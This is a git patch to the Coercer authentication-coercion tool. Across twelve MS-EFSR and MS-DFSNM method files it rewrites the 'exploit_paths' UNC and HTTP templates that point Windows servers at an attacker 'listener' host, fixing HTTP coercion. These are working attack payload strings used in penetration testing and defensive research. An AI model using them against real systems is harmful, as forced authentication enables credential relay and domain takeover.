From 83a1fd7529ab07720b2d917e59847d8cd236c6aa Mon Sep 17 00:00:00 2001 From: "Remi GASCOU (Podalirius)" <79218792+p0dalirius@users.noreply.github.com> Date: Wed, 4 Oct 2023 07:45:31 +0200 Subject: [PATCH] Fixed #42, Coercing HTTP Authentications did not work properly --- coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py | 2 +- coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py | 2 +- coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py | 2 +- coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py | 7 ++++--- coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py | 2 +- .../methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py | 2 +- coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py | 2 +- coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py | 2 +- coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py | 2 +- coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py | 2 +- coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py | 2 +- coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py | 2 +- 12 files changed, 15 insertions(+), 14 deletions(-) diff --git a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py index 032637a..0f6a1ea 100644 --- a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py +++ b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py @@ -43,7 +43,7 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py index 8e05e86..44ffffd 100644 --- a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py +++ b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py @@ -42,7 +42,7 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py index d4952c3..4c82caf 100644 --- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py +++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py @@ -59,7 +59,7 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py index 59a6f34..0ad9841 100644 --- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py +++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py @@ -63,9 +63,10 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL): """ exploit_paths = [ - ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'), - ("smb", '\\\\{{listener}}\\Share\\\x00'), - ("smb", '\\\\{{listener}}\\Share\x00'), + ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), + ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), + ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py index f87d10c..1be12de 100644 --- a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py +++ b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py @@ -41,7 +41,7 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py index d0d38d1..32e75f3 100644 --- a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py +++ b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py @@ -52,7 +52,7 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py index 503ec0f..41e149b 100644 --- a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py +++ b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py @@ -40,7 +40,7 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py index 7aa411d..017dc94 100644 --- a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py +++ b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py @@ -41,7 +41,7 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py index dfd6e05..17cb710 100644 --- a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py +++ b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py @@ -41,7 +41,7 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py index 4eda784..7d92ae5 100644 --- a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py +++ b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py @@ -40,7 +40,7 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py index 7cce310..e723135 100644 --- a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py +++ b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py @@ -40,7 +40,7 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = { diff --git a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py index e2d6167..66ac409 100644 --- a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py +++ b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py @@ -61,7 +61,7 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL): ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), - ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), + ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'), ] access = {